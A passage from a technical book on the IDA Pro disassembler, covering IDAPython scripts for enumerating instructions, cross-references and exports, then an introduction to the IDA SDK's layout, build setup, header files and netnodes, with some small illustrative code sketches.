    for i in FuncItems(func.startEA):   # (2)
        count = count + 1
    Warning("%s contains %d instructions\n" % (fname, count))
else:
    Warning("No function found at location %x" % here())

Listing 15-9: Instruction enumeration in Python

Differences from the IDC version include the use of an SDK function (1)
(accessed via idaapi) to retrieve a reference to a function object (specifically
a func_t) and the use of the FuncItems generator (2) (from idautils) to provide
easy iteration over all of the instructions within the function. Because we can’t
use Python’s len function on a generator, we are still obligated to step through
the generator list in order to count each instruction one at a time.
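The limitation is a property of Python generators in general and can be demonstrated outside IDA. In the standalone sketch below, fake_func_items is a hypothetical stand-in for FuncItems that yields made-up addresses, and count_items shows one compact way to count what a generator produces.

```python
def count_items(iterable):
    """Count the items produced by any iterable, including generators."""
    return sum(1 for _ in iterable)

def fake_func_items():
    """Stand-in for idautils.FuncItems: yields made-up addresses."""
    for addr in (0x401000, 0x401001, 0x401003, 0x401006):
        yield addr

try:
    len(fake_func_items())
except TypeError as err:
    print("len() failed:", err)

print(count_items(fake_func_items()))
```

Converting the generator to a list and taking its length would also work, at the cost of holding every address in memory at once.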

Enumerating Cross-References

The idautils module contains several generator functions that build cross-

reference lists in a somewhat more intuitive way than we saw in IDC. List-

ing 15-10 rewrites the function call enumeration script that we saw previously

in Listing 15-3.

from idaapi import *

func = get_func(here())
if func is not None:
    fname = Name(func.startEA)
    items = FuncItems(func.startEA)
    for i in items:
        for xref in XrefsFrom(i, 0):   # (1)
            if xref.type == fl_CN or xref.type == fl_CF:
                Message("%s calls %s from 0x%x\n" % (fname, Name(xref.to), i))
else:
    Warning("No function found at location %x" % here())

Listing 15-10: Enumerating function calls using Python

New in this script is the use of the XrefsFrom generator (1) (from idautils)
to step through all cross-references from the current instruction. XrefsFrom
returns a reference to an xrefblk_t object that contains detailed information
about the current cross-reference.
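The filtering step lends itself to a list comprehension, as the following standalone Python sketch suggests. The Xref record is a toy stand-in for the objects produced by XrefsFrom, the addresses are made up, and the numeric type codes are our understanding of the SDK's values, included only so that the example runs outside IDA.

```python
from collections import namedtuple

# Stand-ins for the SDK's code cross-reference type codes.
fl_CF, fl_CN, fl_JN, fl_F = 16, 17, 19, 21

Xref = namedtuple("Xref", "frm to type")   # toy version of an xref record

def call_targets(xrefs):
    """Return the destination of every call-type cross-reference."""
    return [x.to for x in xrefs if x.type in (fl_CN, fl_CF)]

toy_xrefs = [
    Xref(0x401000, 0x401005, fl_F),    # ordinary flow to the next instruction
    Xref(0x401005, 0x402000, fl_CN),   # near call
    Xref(0x40100A, 0x401020, fl_JN),   # near jump
    Xref(0x401010, 0x403000, fl_CF),   # far call
]
print([hex(t) for t in call_targets(toy_xrefs)])
```

Only the two call-type references survive the filter; the ordinary-flow and jump references are discarded.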

Enumerating Exported Functions

Listing 15-11 is the Python version of the .idt generator script from Listing 15-5.

file = AskFile(1, "*.idt", "Select IDT save file")
with open(file, 'w') as fd:
    fd.write("ALIGNMENT 4\n")
    fd.write("0 Name=%s\n" % GetInputFile())
    for i in range(GetEntryPointQty()):
        ord = GetEntryOrdinal(i)
        if ord == 0: continue
        addr = GetEntryPoint(ord)
        if ord == addr: continue   #entry point has no ordinal
        fd.write("%d Name=%s" % (ord, Name(addr)))
        purged = GetFunctionAttr(addr, FUNCATTR_ARGSIZE)
        if purged > 0:
            fd.write(" Pascal=%d" % purged)
        fd.write("\n")

Listing 15-11: A Python script to generate IDT files

The two scripts look remarkably similar because IDAPython has no gen-

erator function for entry-point lists, so we are left to use the same set of func-

tions that were used in Listing 15-5. One difference worth noting is that

IDAPython deprecates IDC’s file-handling functions in favor of Python’s

built-in file-handling functions.

Summary

Scripting provides a powerful means for extending IDA’s capabilities. Through
the years, scripts have been used in a number of innovative ways to fill the
needs of IDA users. Many useful scripts are available for download on the
Hex-Rays website as well as the mirror site of the former IDA Palace.[18] IDA
scripts are perfect for small tasks and rapid development, but they are not
ideally suited for all situations.

One of the principal limitations of the IDC language is its lack of support

for complex datatypes and the lack of access to a more fully featured API such

as the C standard library or the Windows API. At the expense of greater com-

plexity, we can lift these limitations by moving away from scripted extensions

and toward compiled extensions. As we will show in the next chapter, com-

piled extensions require the use of the IDA software development kit (SDK),

which has a steeper learning curve than either IDC or IDAPython. However,

the power available when developing extensions with the SDK is usually well

worth the effort spent learning how to use it.

18. See http://old.idapalace.net/.

THE IDA SOFTWARE DEVELOPMENT KIT

Throughout the course of the book, we

have used phrases like “IDA does this,” and

“IDA does that.” While IDA certainly does an

awful lot for us, the intelligence is more correctly

attributed to the various modules upon which IDA

relies. For example, it is the processor module that

makes all of the decisions during the analysis phase, so one could argue that

IDA is only as smart as the processor modules on which it relies. Of course,

Hex-Rays puts tremendous effort into ensuring that its processor modules are

as capable as possible, and for the casual user, IDA neatly hides its modular

architecture beneath its user interface.

At some point you may find yourself needing more power than the IDC

scripting language has to offer, whether for performance reasons or because

you wish to do things that IDC simply was not designed to do. When that

moment arrives, it is time to advance to using IDA’s software development kit

(SDK) to build your own compiled modules for use with IDA.

286 Chapter 16

NOTE The IDC scripting engine is built on top of IDA’s SDK. All IDC functions are ultimately

translated to calls to one or more SDK functions that perform the actual work. While it

is true that if you can do something in IDC, you can do the same thing using the SDK,

the reverse does not hold. The SDK offers far more power than is available using IDC

alone, and many SDK actions have no IDC counterpart.

The SDK exposes IDA’s internal programming interfaces in the form of

C++ libraries and the header files required to interface to those libraries. The

SDK is required in order to create loader modules to handle new file formats,

processor modules to disassemble new CPU instruction sets, and plug-in

modules that might be viewed as more powerful, compiled alternatives to

scripts.

In this chapter we introduce some of the core capabilities of the SDK.

You will find these capabilities useful whether you are creating plug-ins,

loader modules, or processor modules. As each of these types of modules is

covered individually in the following three chapters, the examples in this

chapter are offered without attempting to supply a specific context in which

they might be used.

SDK Introduction

IDA’s SDK is distributed in much the same manner as the other IDA extras

that we have discussed so far. The Zip file containing the SDK can be found

on your original IDA CD, or authorized users can download the SDK from

the Hex-Rays website. Each version of the SDK is named for the version of

IDA with which it is compatible (for example, idasdk61.zip goes with IDA

version 6.1). The SDK features the same minimalist documentation typically

found in other IDA-related tools, which in the case of the SDK means a top-level readme.txt file and additional README files for plug-ins, processor modules, and loaders.

BELLS, WHISTLES, AND BULLETS TO THE FOOT

While working with C++, you will of course have access to a wide variety of C++ libraries, including your operating system’s native APIs. By utilizing such libraries, you may be tempted to incorporate a wide variety of sophisticated features into any modules that you build. However, you should be very careful what functionality you choose to incorporate in this way, as it may lead to instability in IDA. The most concrete example of this is the fact that IDA is a single-threaded application. No effort whatsoever is made to synchronize access to low-level database structures, nor does the SDK provide facilities for doing so. For IDA versions earlier than 5.5, you should never create additional threads that may simultaneously access the database. For versions 5.5 and later, you may create additional threads, but any calls to SDK functions should be queued using the exec_request_t class and the execute_sync function described in kernwin.hpp. Also, you should understand that any blocking* operations you perform will render IDA unresponsive until the operation completes.

*A blocking operation is an action that causes a program to come to a halt while it awaits completion of the action.

The SDK defines the published programming interface that modules

may use to interact with IDA. Prior to SDK version 4.9, it was not uncommon

for these interfaces to change enough that a module that compiled successfully

under SDK 4.8 might no longer compile under a newer SDK, such as

version 4.9, unless it was modified. With the introduction of version 4.9

of the SDK, Hex-Rays chose to standardize the existing API, which means

that not only would modules require no changes to compile successfully with

newer versions of the SDK, but modules would also be binary compatible

with newer versions of IDA. This means that module users need no longer

wait for module authors to update their source code or make available

updated binary versions of their modules each time a new version of IDA is

released. It does not mean that existing API interfaces are completely frozen;

Hex-Rays continues to introduce new features with each new version of the

SDK (that is, each new SDK is a superset of its predecessor). Modules that

make use of these newer features are typically not compatible with older

versions of IDA or the SDK. That said, there have been occasions where, for

various reasons, functions have been renamed or marked as obsolete. The

SDK offers macros to allow or disallow the use of deprecated functions,

making it easy to note when a function has been deprecated.

SDK Installation

Prior to version 5.4, the Zip file containing the SDK does not contain a top-

level directory. Because the SDK shares several subdirectory names with IDA,

it is highly recommended that you create a dedicated SDK directory, such as

idasdk53, and extract the SDK contents into that directory. This will make it

much easier to distinguish SDK components from IDA components. Begin-

ning with version 5.4, the IDA SDK is packaged within a top-level SDK

directory, such as idasdk61, so this step is no longer needed. There is no

requirement to install the SDK in a specific location relative to <IDADIR>.

Regardless of where you choose to install your SDK, we will refer to the SDK

directory generically as <SDKDIR> for the remainder of the book.

SDK Layout

A basic understanding of the directory structure used within the SDK will be

helpful, both in knowing where you might find documentation and in know-

ing where you can expect to find the modules that you build. A quick rundown

of what you can expect to find in the SDK follows.

bin directory

This directory is where the example build scripts save their compiled

modules following a successful build. Installing a module involves copying

the module from the appropriate subdirectory within bin to the appro-

priate subdirectory in <IDADIR>. Module installation will be covered in

more detail in Chapters 17, 18, and 19. This directory also contains a

postprocessing tool required for the creation of processor modules.


etc directory

This directory contains source code for two utilities that are required to

build some SDK modules. Compiled versions of these utilities are also

included with the SDK.

include directory

This directory contains the header files that define the interface to the

IDA API. In short, every API data structure that you are allowed to use

and every API function that you are allowed to call are declared in one

of the header files in this directory. The SDK’s top-level readme.txt file

contains an overview of some of the more commonly used header files

in this directory. The files in this directory constitute the bulk of the

documentation (as in “read the source”) for the SDK.

ldr directory

This directory contains the source code and build scripts for several

example loader modules. The README file for loaders is nothing more

than a rundown of the contents of this directory.

lib directory

This directory contains a number of subdirectories, which in turn con-

tain the link libraries required to build various IDA modules. The subdi-

rectories are named after the compiler with which they should be used.

For example, x86_win_vc_32 (6.1 and later) or vc.w32 (6.0 and earlier) con-

tains the library to use with Visual Studio and 32-bit IDA on Windows,

while x64_mac_gcc_64 (6.1 and later) or gcc64.mac64 (6.0 and earlier) con-

tains the library for use with 64-bit IDA on OSX platforms.

module directory

This directory contains the source code and build scripts for several

example processor modules. The README file for processor modules

is nothing more than a rundown of the contents of this directory.

plugins directory

This directory contains the source code and build scripts for several

example plug-in modules. The README file for plug-ins provides a

high-level overview of the plug-in architecture.

top-level directory

The top level of the SDK contains several make files used for building

modules as well as the main readme.txt file for the SDK. Several additional

install_xxx.txt files contain information regarding installation and con-

figuration for various compilers (for example, install_visual.txt discusses

Visual Studio configuration).

Keep in mind that documentation on using the SDK is sparse. For most

developers, knowledge of the SDK has been derived through trial and error

and extensive exploration of the contents of the SDK. You may have some

luck posting questions to the Research & Resources forum on the Hex-Rays

support forums, where other IDA users familiar with the SDK may answer


them. An excellent third-party resource providing an introduction to the SDK

and plug-in writing is Steve Micallef’s guide titled IDA Plug-in Writing in C/C++ (see footnote 1).

Configuring a Build Environment

One of the more frustrating aspects of using the SDK is not related to pro-

gramming at all. Instead, you may find that it is relatively easy to code up a

solution to a problem only to find that it is virtually impossible to successfully

build your module. This is true because it can be difficult to support a wide

variety of compilers with a single code base, and coding a solution is com-

plicated by the fact that library file formats recognized by Windows compilers

are often incompatible with one another.

All of the examples included with the SDK were created to be built using

Borland tools. From install_make.txt we have the following quote from Ilfak:

WIN32 versions can be created only by Borland C++ CBuilder v4.0.

Probably the old BCC v5.2 will work too, but I haven’t checked it.

That being said, other install_xxx files offer pointers on how to success-

fully build modules with other compilers. A few of the example modules

contain files for building with Visual Studio (<SDKDIR>/plugins/vcsample,

for example), while install_visual.txt offers a series of steps for properly

configuring SDK projects using Visual C++ Express 2005.

In order to build modules using Unix-style tools, either on a Unix-style

system such as Linux or using an environment such as MinGW, the SDK

provides a script named idamake.pl that converts the Borland-style make files

into Unix-style make files prior to initiating the build process. This process is

discussed in install_linux.txt.

NOTE The command-line build scripts provided with the SDK expect an environment variable

named IDA to point to <SDKDIR>. You can set this globally for all scripts by editing

<SDKDIR>/allmake.mak and <SDKDIR>/allmake.unx to set this variable or

by adding an IDA environment variable to your global environment.

Steve Micallef’s guide also provides excellent instructions for configuring

build environments for building plug-ins with various compilers. Our personal

preference when building SDK modules for Windows versions of IDA is to

use the MinGW tools gcc and make. The examples presented in Chapters 17,

18, and 19 include makefiles and Visual Studio project files that do not rely

on any of the build scripts included with the SDK and that are easy to modify

to suit the needs of your projects. Module-specific build configuration will

also be discussed in each of these chapters.

1. See http://www.binarypool.com/idapluginwriting/.

The IDA Application Programming Interface

IDA’s API is defined by the contents of the header files in <SDKDIR>/include. There is no single-source index of available functions (though Steve Micallef has collected a rather nice subset in his plug-in writing guide). Many prospective SDK programmers find this fact initially difficult to

come to terms with. The reality is that there is never an easy-to-find answer to

the question, “How do I do x using the SDK?” The two principal options for

answering such questions are to post the questions to an IDA user’s forum or

attempt to answer them yourself by searching through the API documenta-

tion. What documentation, you say? Why, the header files, of course. Granted,

these are not the most searchable of documents, but they do contain the

complete set of API features. In this case, grep (or a suitable replacement,

preferably built into your programming editor) is your friend. The catch is

knowing what to search for, which is not always obvious.

There are a few ways to try to narrow your searches through the API.

The first way is to leverage your knowledge of the IDC scripting language

and attempt to locate similar functionality within the SDK using keywords

and possibly function names derived from IDC. However—and this is an

extremely frustrating point—while the SDK may contain functions that

perform tasks identical to those of IDC functions, the names of those func-

tions are seldom identical. This results in programmers learning two sets of

API calls, one for use with IDC and one for use with the SDK. In order to

address this situation, Appendix B presents a complete list of IDC functions

and the corresponding SDK 6.1 actions that are carried out to execute those

functions.

The second technique for narrowing down SDK-related searches is to

become familiar with the content and, more important, the purpose of the

various SDK header files. In general, related functions and associated data

structures are grouped into header files based on functional groups. For

example, SDK functions that allow interaction with a user are grouped into

kernwin.hpp. When a grep-style search fails to locate a capability that you

require, some knowledge of which header file relates to that capability will

narrow your search and hopefully limit the number of files that you need to

dig deeper into.

Header Files Overview

While the SDK’s readme.txt files provide a high-level overview of the most

commonly used header files, this section highlights some other useful infor-

mation for working with these files. First, the majority of the header files use

the .hpp suffix, while a few use the .h suffix. This can easily lead to trivial

errors when naming header files to be included in your files. Second, ida.hpp

is the main header file for the SDK and should be included in all SDK-related

projects. Third, the SDK utilizes preprocessor directives designed to preclude

access to functions that Hex-Rays considers dangerous (such as strcpy and

sprintf). For a complete list of these functions refer to the pro.h header file. To

restore access to these functions, you must define the USE_DANGEROUS_FUNCTIONS

macro prior to including ida.hpp in your own files. An example is shown here:

#define USE_DANGEROUS_FUNCTIONS

#include <ida.hpp>


Failure to define USE_DANGEROUS_FUNCTIONS will result in a build error to

the effect that dont_use_snprintf is an undefined symbol (in the case of an

attempt to use the snprintf function). In order to compensate for restricting

access to these so-called dangerous functions, the SDK defines safer equiv-

alents for each, generally in the form of a qstrXXXX function such as qstrncpy

and qsnprintf. These safer versions are also declared in pro.h.
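To make the motivation concrete, here is a minimal standalone sketch of the kind of bounded, always-terminated copy that a function such as qstrncpy is meant to provide. The names bounded_copy and copy_into_small_buffer are hypothetical and are not part of the SDK; the sketch only illustrates the assumed contract (never write past the destination size, always leave a terminator) and does not reproduce the SDK implementation.

```cpp
#include <cassert>
#include <cstddef>
#include <cstring>
#include <string>

// Hypothetical stand-in for a bounded copy in the spirit of qstrncpy.
// It is NOT the SDK function; it only illustrates the assumed contract:
// never write more than dst_size bytes and always null terminate dst.
char *bounded_copy(char *dst, const char *src, std::size_t dst_size) {
    assert(dst != nullptr && src != nullptr);
    if (dst_size == 0) {
        return dst;                 // no room, not even for the terminator
    }
    std::size_t n = std::strlen(src);
    if (n >= dst_size) {
        n = dst_size - 1;           // truncate, reserving one byte for '\0'
    }
    std::memcpy(dst, src, n);
    dst[n] = '\0';
    return dst;
}

// Helper that copies into a deliberately small buffer so the truncation
// behavior can be observed from the returned string.
std::string copy_into_small_buffer(const char *src) {
    char buf[8];
    bounded_copy(buf, src, sizeof(buf));
    return std::string(buf);
}
```

With an 8-byte buffer, a long input is cut to seven characters plus the terminator, whereas strcpy would have written past the end of the buffer.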

Along similar lines, the SDK restricts access to many standard file

input/output variables and functions such as stdin, stdout, fopen, fwrite,

and fprintf. This restriction is due in part to limitations of the Borland

compiler. Here again the SDK defines replacement functions in the form

of qXXX counterparts such as qfopen and qfprintf. If you require access to the

standard file functions, then you must define the USE_STANDARD_FILE_FUNCTIONS

macro prior to including fpro.h (which is included from kernwin.hpp, which is,

in turn, included from several other files).

In most cases, each SDK header file contains a brief description of the

file’s purpose and fairly extensive comments describing the data structures

and functions that are declared in the file. Together these comments consti-

tute IDA’s API documentation. Brief descriptions of some of the more

commonly used SDK header files follow.

area.hpp

This file defines the area_t struct, which represents a contiguous block of

addresses within a database. This struct serves as the base class for several

other classes that build on the concept of an address range. It is seldom

necessary to include this file directly, as it is typically included in files

defining subclasses of area_t.

auto.hpp

This file declares functions used to work with IDA’s autoanalyzer. The

autoanalyzer performs queued analysis tasks when IDA is not busy

processing user-input events.

bytes.hpp

This file declares functions for working with individual database bytes.

Functions declared in this file are used to read and write individual

database bytes as well as manipulate the characteristics of those bytes.

Miscellaneous functions also provide access to flags associated with

instruction operands, while other functions allow manipulation of

regular and repeatable comments.

dbg.hpp

This file declares functions offering programmatic control of IDA’s

debugger.

entry.hpp

This header declares functions for working with a file’s entry points. For

shared libraries, each exported function or data value is considered an

entry point.


expr.hpp

This file declares functions and data structures for working with IDC

constructs. It is possible to modify existing IDC functions, add new IDC

functions, or execute IDC statements from within modules.

fpro.h

This file contains the alternative file I/O functions, such as qfopen,

discussed previously.

frame.hpp

This header contains functions used to manipulate stack frames.

funcs.hpp

This header contains functions and data structures for working with

disassembled functions as well as functions for working with FLIRT

signatures.

gdl.hpp

This file declares support routines for generating graphs using either

DOT or GDL.

ida.hpp

This is the main header file required for working with the SDK. This file

contains the definition of the idainfo structure as well as the declaration

of the global variable inf, which contains a number of fields containing

information about the current database as well as fields initialized from

configuration file settings.

idp.hpp

This file contains declarations of structures that form the foundation

of processor modules. The global variable ph, which describes the current

processor module, and the global variable ash, which describes the current

assembler, are defined in this file.

kernwin.hpp

This file declares functions for interacting with the user and the user

interface. The SDK equivalents of IDC’s AskXXX functions are declared

here, as are functions used to set the display position and configure

hotkey associations.

lines.hpp

This file declares functions for generating formatted, colorized

disassembly lines.

loader.hpp

This file contains the declarations for the loader_t and plugin_t structures

required for the creation of loader modules and plug-in modules, respec-

tively, as well as functions useful during the file-loading phase and

functions for activating plug-ins.


name.hpp

This file declares functions for manipulating named locations (as opposed

to names within structures or stack frames, which are covered in struct.hpp

and funcs.hpp, respectively).

netnode.hpp

Netnodes are the lowest-level storage structure accessible via the API.

The details of netnodes are typically hidden by the IDA user interface.

This file contains the definition of the netnode class and functions for

low-level manipulation of netnodes.

pro.h

This file includes the top-level typedefs and macros required in any SDK

module. You do not need to explicitly include this file in your projects,

as it is included from ida.hpp. Among other things, the IDA_SDK_VERSION

macro is defined in this file. IDA_SDK_VERSION provides a means to deter-

mine with which version of the SDK a module is being built, and it can

be tested to provide conditional compilation when using different ver-

sions of the SDK. Note that IDA_SDK_VERSION was introduced with SDK

version 5.2. Prior to SDK 5.2, there is no official way to determine which

SDK is being used. An unofficial header file that defines IDA_SDK_VERSION

for older versions of the SDK (sdk_versions.h) is available on this book’s

website.

search.hpp

This file declares functions for performing different types of searches on

a database.

segment.hpp

This file contains the declaration of the segment_t class, a subclass of area_t,

which is used to describe individual sections (.text, .data, etc.) within a

binary. Functions for working with segments are also declared here.

struct.hpp

This file contains the declaration of the struc_t class and functions for

manipulating structures within a database.

typeinf.hpp

This file declares functions for working with IDA type libraries. Among

other things, functions declared here offer access to function signatures,

including function return types and parameter sequences.

ua.hpp

This file declares the op_t and insn_t classes used extensively in processor

modules. Also declared here are functions used for disassembling individ-

ual instructions and for generating the text for various portions of each

disassembled line.

xref.hpp

This file declares the datatypes and functions required for adding,

deleting, and iterating code and data cross-references.


The preceding list describes approximately half of the header files that

ship with the SDK. You are encouraged to familiarize yourself not only with

the files in this list but also with all of the other header files as well, as you dig

deeper into the SDK. Functions that make up the published API are marked

as ida_export. Only functions designated as ida_export are exported in the

link libraries that ship with the SDK. Don’t be misled by the use of idaapi,

as it merely signifies that a function is to use the stdcall calling convention

on Windows platforms only. You may occasionally run across interesting-

looking functions that are not designated as ida_export; you cannot use

these functions in your modules.
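As mentioned in the description of pro.h, IDA_SDK_VERSION can be tested to compile different code for different SDK versions. The following is a minimal sketch of that idea, not code taken from the SDK. It assumes the usual numeric encoding in which SDK 5.5 is represented as 550 and SDK 6.1 as 610, and it supplies a fallback definition only so that the fragment compiles without the SDK headers; in a real module the value would come from pro.h by way of ida.hpp. The function name threading_advice is hypothetical.

```cpp
#include <cassert>
#include <string>

// Assumption: when building against a real SDK, pro.h defines
// IDA_SDK_VERSION (for example, 610 for SDK 6.1). The fallback below
// exists only so that this sketch compiles on its own.
#ifndef IDA_SDK_VERSION
#define IDA_SDK_VERSION 610
#endif

// Hypothetical helper that selects behavior at compile time based on the
// SDK version, following the threading guidance given for 5.5 and later.
std::string threading_advice() {
#if IDA_SDK_VERSION >= 550
    return "queue SDK calls with execute_sync";
#else
    return "do not touch the database from extra threads";
#endif
}
```

The same pattern can guard calls to functions that exist only in newer SDKs, allowing one source file to build against several SDK versions.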

Netnodes

Much of IDA’s API is built around C++ classes that model various aspects of a

disassembled binary. The netnode class, on the other hand, seems wrapped in

mystery because it appears to have no direct relationship to constructs within

binary files (sections, functions, instructions, etc.).

Netnodes are the lowest-level and most-general-purpose data storage

mechanism accessible within an IDA database. As a module programmer,

you will seldom be required to work directly with netnodes. Many of the

higher-level data structures hide the fact that they ultimately rely on netnodes

for persistent storage within a database. Some of the ways that netnodes are

used within a database are detailed in the file nalt.hpp, in which we learn, for

example, that information about the shared libraries and functions that a

binary imports is stored in a netnode named import_node (yes, netnodes may

have names). Netnodes are also the persistent storage mechanisms that facil-

itate IDC’s global arrays.

Netnodes are described in extensive detail in the file netnode.hpp. But

from a high-level perspective, netnodes are storage structures used internally

by IDA for a variety of purposes. However, their precise structure is kept

hidden, even to SDK programmers. To provide an interface to these storage

structures, the SDK defines a netnode class, which functions as an opaque

wrapper around this internal storage structure. The netnode class contains a

single data member called netnodenumber, which is an integer identifier used

to access the internal representation of a netnode. Every netnode is uniquely

identified by its netnodenumber. On 32-bit systems the netnodenumber is a 32-bit

quantity, allowing for 2^32 unique netnodes. On 64-bit systems, a netnodenumber

is a 64-bit integer, which allows for 2^64 unique netnodes. In most cases, the

netnodenumber represents a virtual address within the database, which creates

a natural mapping between each address within a database and any netnode

that might be required to store information associated with that address. Com-

ment text is an example of arbitrary information that may be associated with

an address and thus stored within a netnode associated with that address.


The recommended way to manipulate netnodes is by invoking member

functions of the netnode class using an instantiated netnode object. Reading

through netnode.hpp, you will notice that a number of nonmember functions

exist that seem to support netnode manipulation. Use of these functions is

discouraged in favor of member functions. You will note, however, that most

of the member functions in the netnode class are thin wrappers around one of

the nonmember functions.

Internally, netnodes can be used to store several different types of infor-

mation. Each netnode may be associated with a name of up to 512 characters

and a primary value of up to 1,024 bytes. Member functions of the netnode

class are provided to retrieve (name) or modify (rename) a netnode’s name.

Additional member functions allow you to treat a netnode’s primary value as

an integer (set_long, long_value), a string (set, valstr), or an arbitrary binary

blob (set, valobj; see footnote 2). The function used inherently determines how the primary

value is treated.

Here is where things get a little complicated. In addition to a name and a

primary value, every netnode is also capable of storing 256 sparse arrays in which

the array elements can be arbitrarily sized with values up to a maximum of

1,024 bytes each. These arrays fall into three overlapping categories. The first

category of arrays is indexed using 32-bit index values and can potentially

hold in excess of 4 billion items. The second category of arrays is indexed

using 8-bit index values and can thus hold up to 256 items. The last category

of arrays is actually hash tables that use strings for keys. Regardless of which of

the three categories is used, each element of the array will accept values up

to 1,024 bytes in size. In short, a netnode can hold a tremendous amount

of data—now we just need to learn how to make it all happen.
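Because the real storage format is hidden, it can help to picture the layout with a toy model. The sketch below is purely illustrative: ToyNetnode, make_blob, and sparse_demo are hypothetical names, and nothing here reflects how IDA actually implements netnodes. It models only what the text states: a name, a primary value, and tagged sparse arrays whose elements are limited to 1,024 bytes each.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <map>
#include <string>
#include <utility>
#include <vector>

// Toy model only: none of these names come from the SDK.
typedef std::vector<unsigned char> Blob;

// Build a blob of n bytes, each set to fill.
Blob make_blob(std::size_t n, unsigned char fill) {
    Blob b;
    b.assign(n, fill);
    return b;
}

struct ToyNetnode {
    // Key is (array tag, element index); 256 possible tags per netnode.
    typedef std::pair<unsigned char, std::uint32_t> Key;

    std::string name;            // optional name
    Blob primary;                // primary value
    std::map<Key, Blob> arrays;  // sparse: only populated elements exist

    // Store a value in the array selected by tag; reject oversized values.
    bool store(unsigned char tag, std::uint32_t index, const Blob &value) {
        if (value.size() > 1024) {   // per-element limit described in the text
            return false;
        }
        arrays[Key(tag, index)] = value;
        return true;
    }

    // Number of elements that actually occupy storage.
    std::size_t populated() const { return arrays.size(); }
};

// Two widely separated indexes cost two entries, not billions of slots.
std::size_t sparse_demo() {
    ToyNetnode n;
    n.store('S', 1000u, make_blob(16, 0xAA));
    n.store('S', 4000000000u, make_blob(1024, 0xBB));
    bool accepted = n.store('S', 7u, make_blob(1025, 0xCC)); // one byte too large
    assert(!accepted);
    return n.populated();
}
```

The point of the model is the word sparse: an array indexed with 32-bit values can address billions of elements, yet only the elements that have been stored consume any space.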

If you are wondering where all of this information gets stored, you are

not alone. All netnode content is stored within btree nodes in an IDA data-

base. Btree nodes in turn are stored in an ID0 file, which in turn is archived

into an IDB file when you close your database. Any netnode content that you

create will not be visible in any of IDA’s display windows; the data is yours to

manipulate as you please. This is why netnodes are an ideal place for persist-

ent storage for any plug-ins and scripts that you may wish to use to store

results from one invocation to the next.

Creating Netnodes

A potentially confusing point about netnodes is that declaring a netnode

variable within one of your modules does not necessarily create an internal

representation of that netnode within the database. A netnode is not created

internally until one of the following events takes place:

- The netnode is assigned a name.

- The netnode is assigned a primary value.

- A value is stored into one of the netnode’s internal arrays.

2. Binary large object, or blob, is a term often used to refer to arbitrary binary data of varying size.


There are three constructors available for declaring netnodes within your

modules. The prototypes for each, extracted from netnode.hpp, and examples

of their use are shown in Listing 16-1.

#ifdef __EA64__
typedef ulonglong nodeidx_t;
#else
typedef ulong nodeidx_t;
#endif

class netnode {
public:
  netnode();                                                         // (1)
  netnode(nodeidx_t num);                                            // (2)
  netnode(const char *name, size_t namlen=0, bool do_create=false);  // (3)
  bool create(const char *name, size_t namlen=0);                    // (4)
  bool create();                                                     // (5)
  //... remainder of netnode class follows
};

netnode n0;                       // uses (1)
netnode n1(0x00401110);           // uses (2)
netnode n2("$ node 2");           // uses (3)
netnode n3("$ node 3", 0, true);  // uses (3)

Listing 16-1: Declaring netnodes

In this example, only one netnode (n3) is guaranteed to exist within the database after the code has executed. Netnodes n1 and n2 may exist if they had been previously created and populated with data. Whether it previously existed or not, n1 is capable of receiving new data at this point. If n2 did not exist, meaning that no netnode named $ node 2 could be found in the database, then n2 must be explicitly created (using (4) or (5)) before data can be stored into it. If we want to guarantee that we can store data into n2, we need to add the following safety check:

if (BADNODE == (nodeidx_t)n2) {
  n2.create("$ node 2");
}

The preceding example demonstrates the use of the nodeidx_t conversion operator, which allows a netnode to be cast to a nodeidx_t. The operator simply returns the netnodenumber data member of the associated netnode and allows netnode variables to be easily converted into integers.

An important point to understand about netnodes is that a netnode must have a valid netnodenumber before you can store data into the netnode. A netnodenumber may be explicitly assigned, as with n1 via the constructor shown at (2) in Listing 16-1. Alternatively, a netnodenumber may be internally generated when a netnode is created using the create flag in a constructor (as with n3 via the constructor shown at (3)) or via the create function (as with n2). Internally assigned netnodenumbers begin with 0xFF000000 and increment with each newly created netnode.


We have thus far neglected netnode n0 in our example. As things currently

stand, n0 has neither a number nor a name. We could create n0 by name using

the create function in a manner similar to n2. Or we could use the alternate

form of create to create an unnamed netnode with a valid, internally generated

netnodenumber, as shown here:

n0.create(); //assign an internally generated netnodenumber to n0

At this point it is possible to store data into n0, though we have no way to

retrieve that data in the future unless we record the assigned netnodenumber

somewhere or assign n0 a name. This demonstrates the fact that netnodes are

easy to access when they are associated with a virtual address (similar to n1 in

our example). For all other netnodes, assigning a name makes it possible to

perform a named lookup for all future references to the netnode (as with n2

and n3 in our example).

Note that for our named netnodes, we have chosen to use names prefixed

with “$ ”, which is in keeping with the practice, recommended in netnode.hpp,

for avoiding conflicts with names IDA uses internally.
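The creation rules described in this section can be summarized with a small simulation. The sketch below is a toy model and does not use the SDK: ToyDatabase, toy_nodeidx_t, TOY_BADNODE, TOY_FIRST_AUTO, and open_or_create are all hypothetical names, and the value chosen for TOY_BADNODE is an assumption made for illustration. It imitates three behaviors from the text: a lookup by name does not create anything, internally assigned numbers start at 0xFF000000 and increment, and an unnamed node can be found again only if its number is recorded.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <string>

// Toy model only: hypothetical names that imitate the behavior described
// in this section. This is not SDK code.
typedef std::uint32_t toy_nodeidx_t;
const toy_nodeidx_t TOY_BADNODE = 0xFFFFFFFFu;     // assumed "no such node" marker
const toy_nodeidx_t TOY_FIRST_AUTO = 0xFF000000u;  // first internally assigned number

class ToyDatabase {
public:
    ToyDatabase() : next_auto_(TOY_FIRST_AUTO) {}

    // Look up a name without creating anything (compare: netnode n2("$ node 2")).
    toy_nodeidx_t find(const std::string &name) const {
        std::map<std::string, toy_nodeidx_t>::const_iterator it = names_.find(name);
        return it == names_.end() ? TOY_BADNODE : it->second;
    }

    // Create a named node; in this toy, fails if the name is already taken.
    toy_nodeidx_t create(const std::string &name) {
        if (find(name) != TOY_BADNODE) {
            return TOY_BADNODE;
        }
        toy_nodeidx_t num = next_auto_++;
        names_[name] = num;
        return num;
    }

    // Create an unnamed node; the caller must remember the returned number.
    toy_nodeidx_t create() { return next_auto_++; }

private:
    toy_nodeidx_t next_auto_;
    std::map<std::string, toy_nodeidx_t> names_;
};

// Find-or-create, mirroring the BADNODE safety check shown for n2.
toy_nodeidx_t open_or_create(ToyDatabase &db, const std::string &name) {
    toy_nodeidx_t num = db.find(name);
    if (num == TOY_BADNODE) {
        num = db.create(name);
    }
    assert(num != TOY_BADNODE);
    return num;
}
```

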